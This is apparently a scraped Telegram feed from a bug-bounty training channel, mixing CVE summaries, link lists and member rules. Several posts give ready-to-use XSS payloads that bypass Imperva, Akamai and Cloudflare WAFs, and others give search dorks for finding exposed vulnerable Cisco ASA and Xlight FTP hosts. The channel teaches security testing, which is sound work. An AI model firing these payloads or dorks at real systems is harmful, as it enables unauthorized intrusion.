Brut Security – Telegram
Brut Security
Queries: @wtf_brut
🛃WhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
📨E-mail: info@brutsec.com
Subdomain Takeover POC :
subfinder -d domain | httpx -silent > subdomains.txt ; nuclei -t /root/nuclei-templates/http/takeovers -l subdomains.txt
👍81
80% of bug bounties is about understanding the application/framework/protocol (and knowing exactly what you are doing, or whether it's actually worth doing)
👍29🔥4🗿31
CVE-2024-20329: Improper Neutralization of Command Delimiters in Cisco ASA, 9.9 rating 🔥🔥🔥

The vulnerability allows an attacker with low privileges to remotely execute commands via SSH and thus gain full control of the system.

More than 140k instances at Netlas.io:
👉 Link: https://nt.ls/Rfjme
👉 Dork: http.body:"/+CSCOE+/logon.html"

Vendor's advisory: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-ssh-rce-gRAuPEUF
3🗿2👍1
Happy Sunday 🫶
🗿22🔥42👍1
WordPress juicy endpoints #bugbountytips
1👍9
⚡️Found a security vulnerability in any site?
Check if it has a public bug bounty program:

https://xplo1t-sec.github.io/bugbounty-lookup/

#BugBounty #bugbountytips
16🔥3🐳1
A solid XSS payload that bypasses Imperva WAF ⚙️

<a/href="j%0A%0Davanoscript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click

#infosec #cybersec #bugbountytips
1🔥9🐳3
Reflected XSS Akamai WAF Bypass in Redirect Parameter using HTTP Parameter Pollution and Double URL Encode:⚙️

/login?ReturnUrl=javanoscript:1&ReturnUrl=%2561%256c%2565%2572%2574%2528%2564%256f%2563%2575%256d%2565%256e%2574%252e%2564%256f%256d%2561%2569%256e%2529
1🔥5👍4🐳2
Cloudflare #XSS WAF Bypass by @nav1n0x

Payload:
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F 


#cybersec #bugbountytips #infosec
1👍10🗿3🐳1
An XSS payload to bypass some WAFs & filters in Firefox

<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">


#infosec #cybersec #bugbountytips
19
Retrieves DNS records without any authentication

curl -s "https://api.hackertarget.com/dnslookup/?q=example.com"


Replace example.com with the target domain.
26🗿127👍2
1)Finding a Hidden GraphQL Endpoint
https://medium.com/@codingbolt.in/finding-a-hidden-graphql-endpoint-56001ab29f85

2)My 2nd bounty : Referer-based access control + Response manipulation
https://medium.com/@adebayosec/my-2nd-bounty-referer-based-access-control-response-manipulation-2ab7f54d083f

3)CSRF Bypass Using Domain Confusion Leads To ATO
https://infosecwriteups.com/csrf-bypass-using-domain-confusion-leads-to-ato-ac682dd17722

4)Linear-feedback. Shift. Register
https://cyancharley.medium.com/linear-feedback-shift-register-ac6fc3298c35

5)ASCWG Reverse Engineering challenges
https://s3dny.medium.com/ascwg-reverse-engineering-challenges-778e47a5be80

6)picoCTF: No SQL Injection
https://medium.com/@baracarlo/picoctf-no-sql-injection-93a253cc4d09

7)Sunset:1 Walkthrough
https://medium.com/@nikhilbwr34/sunset-1-walkthrough-d124d06fcc93

8)Gixposed is a powerful command-line tool designed to search the commit history of Git repositories for sensitive information, such as API keys and access tokens
https://github.com/WH1T3-E4GL3/gixposed

9)MM-ReverseIPLookup, created to take a domain name and find all (A) records associated with an IP address using multiple free sources
https://github.com/FINAL094/MM-ReverseIPLookup

10)Hidden secrets and urls in JS Mass hunting || Bug bounty POC
https://www.youtube.com/watch?v=HAAG5_mSxdk
👍72
CVE-2024-46483: Integer Overflow in Xlight FTP Server, 9.8 rating 🔥

By overflowing the variable, an attacker could cause remote code execution on the host or a denial of service.

Search at Netlas.io:
👉 Link: https://nt.ls/M8D2R
👉 Dork: \*.banner:"Xlight" OR raw_tcp.response_data:"Xlight"

Read more: https://github.com/kn32/cve-2024-46483
👍32
⚡️Parameter that could be vulnerable to server side request forgery !
13👍3
Pre-Auth RCE CyberPanel 0day by Chirag Artani 🔥

Useful video from our friend's channel about one of the freshest big vulnerabilities with Netlas search 🔎

We also recommend checking out his website and Twitter for more tips:

👉 Site: 3rag.com
👉 Twitter: x.com/Chirag99Artani
🔥43👍1
🚨 Warning to All Members 🚨

Brut Security is a professional community focused strictly on learning and discussing cybersecurity topics. Any personal questions about religion, race, or similar matters are strictly prohibited. We are here to learn and grow as ethical hackers, not to engage in discussions unrelated to cybersecurity.

Please adhere to these guidelines:

1. Keep all conversations focused on cybersecurity topics.
2. Avoid personal questions about members’ religious or cultural backgrounds.
3. Show respect for all members—this is a safe, professional space.

Failure to follow these rules will lead to immediate removal from the group.

For Queries Related to Enrolment or Other Questions, Do Reach here @brutsecurity_bot
🔥1211👍6